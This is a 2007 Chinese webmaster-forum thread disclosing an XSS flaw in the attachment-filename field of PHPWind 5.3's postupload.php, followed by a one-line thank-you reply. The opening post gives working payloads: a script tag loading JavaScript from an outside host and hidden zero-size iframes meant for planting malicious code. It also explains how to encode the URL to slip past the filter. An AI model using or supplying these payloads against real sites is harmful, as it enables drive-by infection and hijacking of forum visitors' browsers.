PHPWind论坛5.3版postupload.php附件文件名跨站脚本漏洞(XSS)

ホ棒ホ棒~餹

中级站长

Rank: 7 Rank: 7 Rank: 7

UID: 212
帖子: 215
积分: 669
威望: 34
金币: 0
经验: 634
注册时间: 2007-5-28
最后登录: 2007-8-21

站长论坛第 212 位会员

楼主大中小发表于 2007-6-28 23:17 只看该作者

PHPWind论坛5.3版postupload.php附件文件名跨站脚本漏洞(XSS)

require\postupload.php文件对atc_attachment_name变量过滤不严，导致跨站脚本执行漏洞，可能引起站点被嵌入恶意代码。

在附件处填写:
D:\badwolf:<SCRIPT SRC=http://www.liyingfei.com/a.js>XSS.rar (转换为ASSIC编码POST)

其实不用远程调用JS文件，也可以直接达到挂马的效果如下,本地测试环境：phpwind5.0.1

Copy code

D:\badwolf<iframe src=http://www.liyingfei.com/><%2Fiframe>XXS.rar

D:\badwolf<iframe src=http://www.liyingfei.com/test.htm width=0 height=0><%2Fiframe>XXS.rar

过滤了/和"，构造语句如上。http://www.liyingfei.com/test.htm 十六进制编码即可

ホ棒ホ棒~餹滴个人博客 (*^__^*)

TOP

da9049514

二级站长

Rank: 6 Rank: 6

UID: 4504
帖子: 15
积分: 167
威望: 1
金币: 0
经验: 166
注册时间: 2007-7-17
最后登录: 2008-3-6

站长论坛第 4504 位会员

沙发大中小发表于 2007-7-17 21:08 只看该作者

学习看了.......谢谢

TOP

‹‹ 上一主题 | 下一主题 ››